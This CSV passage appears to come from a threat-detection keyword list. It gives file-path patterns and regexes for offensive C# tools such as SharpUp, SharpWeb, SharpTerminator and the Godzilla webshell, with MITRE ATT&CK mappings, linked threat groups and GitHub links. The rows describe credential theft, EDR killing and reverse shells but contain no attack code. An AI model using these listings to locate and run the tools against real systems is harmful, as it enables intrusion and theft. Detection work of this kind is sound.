"*/SharpSQLPwn.exe*",".{0,1000}\/SharpSQLPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11120"
"*/SharpSQLTools.exe*",".{0,1000}\/SharpSQLTools\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11121"
"*/SharpSSDP.git*",".{0,1000}\/SharpSSDP\.git.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","1","N/A","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","11122"
"*/SharpSSDP/*",".{0,1000}\/SharpSSDP\/.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","1","N/A","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","11123"
"*/SharpStay.exe*",".{0,1000}\/SharpStay\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11124"
"*/SharpStay.exe*",".{0,1000}\/SharpStay\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11125"
"*/SharpStay.exe*",".{0,1000}\/SharpStay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11126"
"*/SharpStay.git*",".{0,1000}\/SharpStay\.git.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","11127"
"*/SharpStay/*",".{0,1000}\/SharpStay\/.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","11128"
"*/SharpSvc.exe*",".{0,1000}\/SharpSvc\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11129"
"*/SharpSvc.exe*",".{0,1000}\/SharpSvc\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11130"
"*/SharpSword.git*",".{0,1000}\/SharpSword\.git.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","8","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","11131"
"*/SharpSword/SharpSword*",".{0,1000}\/SharpSword\/SharpSword.{0,1000}","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","10","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","11132"
"*/SharpSystemTriggers*",".{0,1000}\/SharpSystemTriggers.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","11133"
"*/SharpTask.exe*",".{0,1000}\/SharpTask\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11134"
"*/SharpTask.exe*",".{0,1000}\/SharpTask\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11135"
"*/SharpTask.exe*",".{0,1000}\/SharpTask\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11136"
"*/SharpTerminator/*",".{0,1000}\/SharpTerminator\/.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","11137"
"*/SharpThief.git*",".{0,1000}\/SharpThief\.git.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","11138"
"*/SharpThief/tarball*",".{0,1000}\/SharpThief\/tarball.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","11139"
"*/SharpThief/zipball*",".{0,1000}\/SharpThief\/zipball.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","11140"
"*/SharpToken/releases/download/*",".{0,1000}\/SharpToken\/releases\/download\/.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","11141"
"*/SharpTokenFinder.exe*",".{0,1000}\/SharpTokenFinder\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11142"
"*/SharpUnhooker.git*",".{0,1000}\/SharpUnhooker\.git.{0,1000}","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","N/A","9","5","400","80","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z","11143"
"*/SharpUp.exe*",".{0,1000}\/SharpUp\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11144"
"*/SharpUp.exe*",".{0,1000}\/SharpUp\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11145"
"*/SharpUp.exe*",".{0,1000}\/SharpUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11146"
"*/SharpUp.exe*",".{0,1000}\/SharpUp\.exe.{0,1000}","offensive_tool_keyword","SharpUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11147"
"*/SharpUp.git*",".{0,1000}\/SharpUp\.git.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","11148"
"*/SharpVeeamDecryptor.*",".{0,1000}\/SharpVeeamDecryptor\..{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","1","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","11149"
"*/SharpView.exe*",".{0,1000}\/SharpView\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11150"
"*/SharpView.exe*",".{0,1000}\/SharpView\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11151"
"*/SharpView.exe*",".{0,1000}\/SharpView\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta - APT29","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11152"
"*/SharpView.exe*",".{0,1000}\/SharpView\.exe.{0,1000}","offensive_tool_keyword","SharpView","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11153"
"*/SharpView.git*",".{0,1000}\/SharpView\.git.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","11154"
"*/SharpWeb.dll*",".{0,1000}\/SharpWeb\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","11155"
"*/SharpWeb.exe*",".{0,1000}\/SharpWeb\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11156"
"*/SharpWeb.exe*",".{0,1000}\/SharpWeb\.exe.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","1","N/A","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","11157"
"*/SharpWeb.git*",".{0,1000}\/SharpWeb\.git.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","1","N/A","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","11158"
"*/SharpWebScan.exe*",".{0,1000}\/SharpWebScan\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11159"
"*/SharpWebServer.exe*",".{0,1000}\/SharpWebServer\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11160"
"*/SharpWebServer.exe*",".{0,1000}\/SharpWebServer\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11161"
"*/SharpWifiGrabber.exe*",".{0,1000}\/SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11162"
"*/SharpWifiGrabber.exe*",".{0,1000}\/SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11163"
"*/SharpWifiGrabber.exe*",".{0,1000}\/SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11164"
"*/sharpwmi.exe*",".{0,1000}\/sharpwmi\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11165"
